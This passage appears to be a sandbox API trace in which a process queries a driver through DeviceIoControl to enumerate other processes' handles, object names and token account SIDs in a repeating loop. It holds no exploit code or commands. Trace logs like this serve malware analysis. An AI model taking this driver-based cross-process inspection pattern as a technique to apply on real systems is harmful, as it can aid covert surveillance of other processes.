Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.890] ObfDereferenceObject (Object=0xfffffa8001f5b070) returned 0x1 [0245.890] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.890] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.890] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.890] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.891] PsAcquireProcessExitSynchronization () returned 0x0 [0245.892] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0) [0245.892] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.892] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.892] PsReleaseProcessExitSynchronization () returned 0x2 [0245.892] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0245.892] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.892] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.892] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.892] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0xc8 [0245.892] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.892] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f5eb30, HandleInformation=0x0) returned 0x0 [0245.892] ObOpenObjectByPointer (in: Object=0xfffffa8001f5eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.892] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x14 [0245.892] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.892] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.892] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.892] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.892] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.895] CloseHandle (hObject=0xc4) returned 1 [0245.895] CloseHandle (hObject=0xc8) returned 1 [0245.895] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.895] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.895] PsAcquireProcessExitSynchronization () returned 0x0 [0245.895] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0) [0245.895] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e7b3b0, HandleInformation=0x0) returned 0x0 [0245.895] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.895] PsReleaseProcessExitSynchronization () returned 0x2 [0245.895] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0245.895] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.895] ObfDereferenceObject (Object=0xfffffa8001e7b3b0) returned 0x1 [0245.895] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.895] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.895] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.895] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.895] PsAcquireProcessExitSynchronization () returned 0x0 [0245.895] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0) [0245.896] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020158b0, HandleInformation=0x0) returned 0x0 [0245.896] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.896] PsReleaseProcessExitSynchronization () returned 0x2 [0245.896] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0245.896] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.896] ObfDereferenceObject (Object=0xfffffa80020158b0) returned 0x1 [0245.896] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.896] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.896] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.896] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.896] PsAcquireProcessExitSynchronization () returned 0x0 [0245.896] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880053c85d0) [0245.896] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.896] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.896] PsReleaseProcessExitSynchronization () returned 0x2 [0245.896] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0245.896] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.896] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.896] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.896] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7dc) returned 0xc8 [0245.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.896] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f60b30, HandleInformation=0x0) returned 0x0 [0245.897] ObOpenObjectByPointer (in: Object=0xfffffa8001f60b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.897] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x14 [0245.897] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.897] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.897] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.897] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.897] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.899] CloseHandle (hObject=0xc4) returned 1 [0245.899] CloseHandle (hObject=0xc8) returned 1 [0245.899] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.899] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.899] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.899] PsAcquireProcessExitSynchronization () returned 0x0 [0245.899] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0) [0245.899] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f5a650, HandleInformation=0x0) returned 0x0 [0245.899] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.899] PsReleaseProcessExitSynchronization () returned 0x2 [0245.900] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0245.900] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.900] ObfDereferenceObject (Object=0xfffffa8001f5a650) returned 0x1 [0245.900] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.900] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.900] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.900] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x9e, lpOverlapped=0x0) returned 1 [0245.900] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.900] PsAcquireProcessExitSynchronization () returned 0x0 [0245.900] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0) [0245.900] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f62840, HandleInformation=0x0) returned 0x0 [0245.900] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.900] PsReleaseProcessExitSynchronization () returned 0x2 [0245.900] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0245.900] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.900] ObfDereferenceObject (Object=0xfffffa8001f62840) returned 0x1 [0245.900] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.900] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.900] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.900] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.900] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.900] PsAcquireProcessExitSynchronization () returned 0x0 [0245.900] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880053c85d0) [0245.901] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.901] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.901] PsReleaseProcessExitSynchronization () returned 0x2 [0245.901] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0245.901] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.901] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.901] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.901] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3b4) returned 0xc8 [0245.901] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.901] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001edd630, HandleInformation=0x0) returned 0x0 [0245.901] ObOpenObjectByPointer (in: Object=0xfffffa8001edd630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.901] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x14 [0245.901] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.901] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.901] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.901] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.901] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.903] CloseHandle (hObject=0xc4) returned 1 [0245.903] CloseHandle (hObject=0xc8) returned 1 [0245.903] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.903] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.903] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.903] PsAcquireProcessExitSynchronization () returned 0x0 [0245.903] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0) [0245.904] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003792f20, HandleInformation=0x0) returned 0x0 [0245.904] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.904] PsReleaseProcessExitSynchronization () returned 0x2 [0245.904] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0245.904] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.904] ObfDereferenceObject (Object=0xfffffa8003792f20) returned 0x1 [0245.904] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.904] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.904] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.904] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0245.904] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.904] PsAcquireProcessExitSynchronization () returned 0x0 [0245.904] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0) [0245.904] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e96dd0, HandleInformation=0x0) returned 0x0 [0245.904] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.904] PsReleaseProcessExitSynchronization () returned 0x2 [0245.904] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0245.904] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.904] ObfDereferenceObject (Object=0xfffffa8001e96dd0) returned 0x1 [0245.904] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.904] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.904] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.904] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.904] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.904] PsAcquireProcessExitSynchronization () returned 0x0 [0245.904] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880053c85d0) [0245.905] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.905] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.905] PsReleaseProcessExitSynchronization () returned 0x2 [0245.905] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0245.905] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.905] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.905] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.905] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0xc8 [0245.905] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.905] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001ee8b30, HandleInformation=0x0) returned 0x0 [0245.905] ObOpenObjectByPointer (in: Object=0xfffffa8001ee8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.905] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x14 [0245.905] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.905] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.905] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.905] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.905] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, 